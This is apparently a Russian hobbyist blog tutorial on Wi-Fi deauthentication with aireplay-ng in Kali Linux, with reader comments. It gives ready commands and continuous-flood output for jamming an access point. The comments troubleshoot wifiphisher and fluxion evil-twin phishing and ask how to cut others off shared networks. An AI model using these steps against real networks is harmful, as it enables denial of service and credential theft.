Деаутентификация клиентов беспроводной сети в Kali Linux

Эта статья основывается на официальной документации: Deauthentication.

Что такое деаутентификация (описание)

Эта атака отправляет пакеты для разъединения одному или более клиентам, которые в данный момент подключены к конкретной точке доступа. Рассоединение клиентов может быть выполнено по ряду причин:

  • Восстановление скрытого ESSID. Скрытый ESSID не присутствует в радиовещании. Другой термин для этого явления это “cloaked” (скрытая).
  • Захват рукопожатий WPA/WPA2 путём принуждения клиентов к разъединению
  • Генерация ARP запросов (клиенты Windows иногда стирают их ARP кэш во время дисконекта)
  • Атака отказ в обслуживании (DoS) — бесконечная отправка пакетов деаутентификации приводит к отказу в обслуживании
  • Содействие атаке злой двойник — отправка пакетов деаутентификации подавляет истинную ТД, при этом свои «услуги» начинает предлагать фальшивая ТД

Конечно, эта атака совершенно бесполезна, если отсутствуют подключённые беспроводные клиенты или имеет место фальшивые аутентификации.

Использование (реализация деаутентификации)

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Где:

  • -0 означает деаутентификацию
  • 1 это количество отправляемых пакетов деаутентификации (вы можете отправлять несколько, если хотите); 0 означает отправлять их непрерывно
  • -a 00:14:6C:7E:40:80 это MAC адрес точки доступа
  • -c 000:0F:B5:AE:CE:9D это MAC адрес клиента для деаутентификации; если это значение пропущено, то все клиенты будут деаутентифицированы
  • ath0 это имя интерфейса

Типичный вывод

12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

Примеры использования aireplay-ng

Как обычно, начнём с переводы карты в режим монитора (если вы ещё этого не сделали) как описано здесь.

Теперь нам нужно узнать ВSSID точки доступа, от которой мы будет отключать клиентов. Это можно сделать с помощью программы airodump-ng (справка по программе airodump-ng в Энциклопедии Kali Linux)

airodump-ng wlan0

31

Нас интересует сеть Mial, её ВSSID 20:25:64:16:58:8C

Я не нашёл клиентов этой сети, поэтому не указываю эту опцию. Также я поставил 0 для количества отправляемых пакетов.

Ещё обращаем внимание на канал, он равен единице. Установить канал можно командой iwconfig wlan0 channel n, где вместо n нужно подставить номер канала.

Таким образом, для успешной атаки нам нужно последовательно выполнить две команды:

iwconfig wlan0 channel 1
aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0

Вывод будет примерно таким:

root@HackWare:~# iwconfig wlan0 channel 1
root@HackWare:~# aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0
20:59:42 Waiting for beacon frame (BSSID: 20:25:64:16:58:8C) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:59:42 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:42 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:43 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:43 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:44 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:44 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:46 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:46 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:47 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:47 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:48 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:48 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:49 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:49 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]
20:59:50 Sending DeAuth to broadcast -- BSSID: [20:25:64:16:58:8C]

Пока программа работает, невозможно подключиться к этой точке доступа.

Вместо ВSSID можно указывать более понятное имя (ESSID). Делается это с опцией -e. Т.е. для моего примера команда приобретёт вид:

aireplay-ng -0 0 -e Mial wlan0

Она равнозначна предыдущей и точно также прекрасно отработает.

Ошибка Waiting for beacon frame (BSSID: ) on channel No such BSSID available. Please specify an ESSID (-e).

Если при выполнении команды у вас появилось что-то подобное этому

root@HackWare:~# aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0
20:52:47 Waiting for beacon frame (BSSID: 20:25:64:16:58:8C) on channel 1
20:52:57 No such BSSID available.
Please specify an ESSID (-e).

Это означает что:

  • точка доступа на другом канале
  • точка доступа больше не доступна
  • другая программа поменяла канал вашего беспроводного сетевого интерфейса

Помните, что некоторые точки доступа настроены на автоматическую смену каналов, особенно после внезапной деаутентификации всех клиентов. Не забывайте переключать каналы в след за точкой доступа.

Подсказки использования

Обычно атака более эффективна если указать конкретную станцию (клиента) с параметром -c.

Пакет деаутентификации направляется напрямую от вашего ПК клиентам. Поэтому вы должны быть достаточно близко к клиентам, чтобы передача вашей беспроводной карты доставала их.

Решение проблем

Почему деаутентификация не работает?

Этому может быть несколько причин, и одна или сразу несколько из них могут быть вашим случаем:

  • Вы слишком далеко от клиента(ов). Вам нужна достаточная мощность передатчика, чтобы пакеты достигали клиетов и могли быть услышаны ими. Если делаете полный захват пакетов, каждй отправленный клиенту пакет должен приводить к обратному “ack” пакету. Это означает, что клиент услышал пакет. Если “ack” нету, то вероятнее всего он не получил пакет.
  • Беспроводные карты работают в конкретном режиме, таких как b, g, n и т. д. Если ваша карта в другом режиме, чем карта клиента, то скорее всего клиенты не будет способен должным образом получить вашу передачу. Смотрите предыдущий пункт, для подтверждения того, что клиент получил пакет.
  • Некоторые клиенты игнорируют широковещательные деаутентификациии. В этом случае вам нужно отправить деаутентификацию напрямую конкретному клиенту.
  • Клиенты могут переподключаться слишком быстро для того, чтобы вы могли увидеть их разъединёнными. Если вы делаете полный захват пакетов, вы сможете увидеть пакеты воссоединения в захваченных данных, это подтвердит то, что деаутентификация работает.

Рекомендуемые статьи:

35 комментариев на Деаутентификация клиентов беспроводной сети в Kali Linux

  1. Mrakobes:

    Хотел спросить. Иногда, можно заметить клиентов , без точек доступа (not associated), которые как я понимаю (летают через "меня") . Можно ли с ними что-то сделать ? Например та же aireplay-ng -0 0 ?

    • Alexey Alexey:

      Комментарий попал в спам, поэтому такой долгий ответ…

      not associated это те, кто проходит мимо вас с включённым Wi-Fi. Например, кто-то был подключён к Wi-Fi дома, пошёл в институт, а Wi-Fi в телефоне не отключил. Еесли они не пытаются подключиться к «бесплатному Интернету», а просто проходят мимо, то ничего интересного с ними сделать нельзя.

      Иногда Airodump-ng показывает, к каким точкам доступа они пытаются подключиться.

      Можно с помощью iSniff-GPS попытаться получить информацию, где эти клиенты бывали раньше.

      Также not associated могут оказаться любителями халявы – бесплатного интернета. Если так, то это прекрасные кандидаты для подключения к фальшивой точке доступа (WiFi-Pumpkin, airgeddon, Mana). Если они подключаться к фальшивой точке доступа, то дальше можно выполнять атаки человек-посередине, поиск паролей в трафике, делать разные штуки с фальшивым DNS и т.д.

      • Алексей Лисицын:

        Але.. Alexey, здравствуйте еще раз, я вам написал письмо с проблемой, проблема заключается в mdk3

      • Алексей Лисицын:

        Ойй не дошло)

        Во время обновления компьютера я включил видео после чего вылетил в главное меню

        потом я заходил и был синий экран, если я нажимал на иконку вылет туда же.

        Я зашел без графической оболочки и продолжил апгрейд, но apt сломалс и ссказал чтоб я запустил dpkg

        Я так и сделал (вроде бы) пока что все хорошо но есть серьезная (для меня) пролема-

        при запуске mdk3 b он ничего не показывает, а действия производит.

        Т.е. даже не показывает клиентов (ничего кроме (как) 2 энтера и 2 пробела

        Возможно, вы знаете, как помочь?

      • Алексей Лисицын:

        И еще одна тяжелейшая проблема - ривер пишет 4.15% готово (уже всю ночь так пишет)

        У меня завтра интернет отключат…(честно))

        Надеюсь все понятно =)

      • Марк:

        Здравствуйте, очень нужна ваша помощь по wifiphishery и fluxion, одна и таже ошибка, если не трудно напишите мне на почту, буду нереально признателен)

        • Alexey Alexey:

          Спрашивайте здесь в комментариях.

          • Марк:

            в общем такая проблема, после активации wifiphishera, атаки на выбранную сети вылазит окно в котором должны отображаться мак адреса, оно собственно вылазит, НО напротив макс адресов написано deauth/disas и как я понял компьютеров никак данная атака не касается, только ловятся андроид устройства и ios, а что не так с компьютерами? почему на атакуемой сети компьютеры не подвергаются атаке, а спокойно продолжают сидеть в инете?

            • Марк:

              Та же ситуация и с fluxion

               

            • Alexey Alexey:

              В какой ОС тестируете и как устанавливали (какими командами) wifiphisher?

              Какие у вас Wi-Fi карты?

              В fluxion тоже выводятся слова deauth/disas и extension feed? Можно увидеть скриншот из fluxion?

            • Alexey Alexey:

              Меня вначале смутил скриншот (это версия 1.4, а в Kali в репозиториях версия 1.1). Я установил последнюю версию и стало понятнее. Судя по всему, у вас атака проходит правильно.

              Вы говорите, что нет компьютеров. Возможно, компьютеры не подключены к точке доступа или подключены по проводу, либо подключены по Wi-Fi, но на 5 ГГц.

          • Марк:

            Laki linux 2017.3 установлена на флэшку, запускаюсь не как live режим, а как persistence. но и в live режиме пробовал, та же проблема вводил команды 

            wget https://archive.kali.org/archive-key.asc
            apt-key add archive-key.asc
            apt-get update
            apt-get install hostapd-wpe
            aireplay-ng -9 wlan0
            git clone https://github.com/sophron/wifiphisher.git
            cd wifisphisher
            sudo python setup.py install
            wifiphisher
            
          • Марк:

            Вот скрин fluxion, но тут почему то в окне deauth all [mdk3] ничего не двигается. Мне кажется что то не так с деаунтефикацией. В разных программах почти одно и тоже… но вот что, я всю голову сломал уже, месяц никак не могу настроить, как только не устанавливал линукс, какие адаптеры только не пробовал, и с командой sudo все прописывал, все равно никак(( спасибо что помогает… так же устанавливал свежую linux kali 2018.1 не помогло, делал полное обновление, тоже не помогло(

          • Марк:

            Вот адаптеры сетевые, извиняюсь за качество

            • Alexey Alexey:

              Когда вводите команды

              aireplay-ng -9 wlan0
              aireplay-ng -9 wlan1

              Пишет "Injection is working!"?

              Я имел ввиду название адаптеров, которое можной посмотреть командой

              airmon-ng
              

              Также там будет написано, какие драйверы используются - это тоже важно. Судя по всему, Wi-Fi адаптеры поддерживают режим монитора, но не поддерживают беспроводную инъекцию. Такое бывает, совсем недавно писал об этом https://hackware.ru/?p=4666

          • Марк:

            Я уверен в том что не идет атака на компьютеры потому что тестирую сначала на своей сети, так же она работает точно не на 5 Ггц, вот еще скриншоты комманд которые вы просили… Спасибо Вам за помощь, вся надежда на Вас)

            • Alexey Alexey:

              Я протестировал на своей сети, у меня компьютер также подвержен атаке наравне с мобильными устройствами:

              c4:85:08:e1:67:ed – это MAC Wi-FI адаптера на ноутбуке.

              Ваши Wi-Fi карты отлично подходят для атаки – всё должно работать.

              Скорее всего, какие-то индивидуальные особенности сети, которую атакуете.

              Можно попробовать поменять адаптеры местами, т.е. сначала использовать один адаптер для глушения, а другой для создания фейковой ТД, а затем наоборот. Для этого wifiphisher нужно запускать следующим образом (wlan0 и wlan1 замените на имена ваших беспроводных интерфейсов, если они различаются):

              wifiphisher -aI wlan0 -eI wlan1

              А затем:

              wifiphisher -aI wlan1 -eI wlan0
              
          • Марк:

            Странно, почему же мои компы не подвергаются атаке… обязательно попробую вами предложенный способ, и тогда отпишусь как успехи) Спасибо еще раз что помогаете…

          • Марк:

            Получается эти комманды нужно вводить до запуска самого wifiphishera?

             

            • Alexey Alexey:

              Это и есть команды запуска wifiphisher. Эта программа поддерживает опции. При запуске без опций, она работает по своим алгоритмам, к примеру, она самостоятельно определяет, какую карту использовать для глушения, а какую для создания Точки Доступа. Используя опции, можно изменить стандартную работу, например, выбрать другую Wi-Fi карту для глушения.

          • Марк:

            Все равно ничего не получается… ловятся только андроид и ios устройства и то не всегда, а про компьютеры я вообще молчу) пробовал и различные сети у знакомых, все одно и тоже… fluxion так же… чую что что то здесь не то)) 

            • Марк:

              Спасибо большое, буду дальше искать в чем проблема

               

        • Марк:

          может быть вы еще какие нибудь методы подскажите взлома wifi сетей? 

           

  2. Алексей Лисицын:

    Здравствуйте, Алексей. Точнее, Alexey)

    У меня такая проблема - недавно начал заниматься Kali Linux, теперь же пользуюсьтолько ей, но

    она настолько "большая", что пока что сориентировался тоько на wi-fi.

    Не подскажете ли, с чего начать и чем продолжить? Деаунтефичировать, досить ТД я умею,

    не очень ясно понимаю ак это работает, плохо знаю английский, да и дальше не знаю что изучать -

    нету даже оглавления так сказать;)

    Я бы хотел изучеть до глубины.. скажем.. состава маячков )

    Вы не могли бы мну помочь с образованием? Я отнесусь к этому с большой благодарностью!)

    • Alexey Alexey:

      Приветствую! У меня похожая ситуация, может, только я начал чуть раньше. Для меня это хобби, т.е. количество времени, которое я могу потратить на это, ограниченно. Чтобы извлечь максимальную пользу из этих потраченных часов, я изучаю прикладные аспекты – практику, инструменты и основы работы с ними.

      Я знаю, например, где почитать про структуру фреймов (в wifu, например, есть про это), знаю, что их удобно смотреть в Wireshark, но я не планирую углубляться в эти вопросы, т.к. эта информация полезна для разработчиков новых инструментов, для серьёзных специалистов, которые готовы потратить на это изучение много времени, для которых это является частью работы. Мне же эта информация не принесёт никакой пользы, разве что, может быть когда-то поможет разобраться с какой-нибудь проблемой или редкой ошибкой. Т.е. я считаю эту информацию полезной, но у меня нет и не было времени на её изучение, поэтому я также не могу помочь с этим. Но зато в Интернете материалов по работе беспроводных протоколов достаточно, на мой взгляд, не хватает инструкций по актуальным инструментам – именно это мне и интересно, этим я здесь и занимаюсь.

      Я считаю, что бессистемные знания трудно развивать и просто помнить, поэтому стараюсь собрать ту информацию, которую «намайнил», в что-то вроде онлайн книг. По Wi-Fi получается так: https://hackware.ru/?p=372

  3. Pushkin:

    Вот тоже появился вопрос у меня есть сеть на ней сидят много человек как мне их всех отключить а меня милого оставить ? 

  4. сергей:

    у меня такой вопрос. стоят две вайфай карты - одна встроенная, одна юсби и обе подключаются автоматически к вайфаю. как или какой командой их от выйфая отцепить, не пойму.

  5. Антонио:

    Привет народ!  У меня вот собственно вопрос. "Конечно, эта атака совершенно бесполезна, если отсутствуют подключённые беспроводные клиенты или имеет место фальшивые аутентификации." И как тогда быть? Есть варианты?

  6. n1gh7m4r3:

    А можно ли как то предовратить атаку? Или ничего не остается и только ждать пока какой-то злоумышленик провернет это дело?

    • Alexey Alexey:

      Для этой атаки используются разные инструменты, которые основываются на разных методах, поэтому 100% гарантией против этой атаки является только проводное соединение. Тем не менее, атака не несёт в себе действительно серьёзной угрозы.

      Для атакуемого, атака несёт два негативных последствия:

      • возможно перехватить т.н. рукопожатие;
      • если атака не прекращается, то невозможно подключиться к Wi-Fi.

      Что касается первого пункта – если пароль длинный (12 и более символов) и использованы символы из четырёх групп (большие буквы, маленькие буквы, цифры и специальные символы), то перехват рукопожатия не страшен, поскольку на подбор пароля уйдёт слишком много времени.

      Что касается второго пункта, то атакующий всё время должен находится в радиусе работы Wi-Fi, а этом 300 метров и менее.

Добавить комментарий

Ваш e-mail не будет опубликован.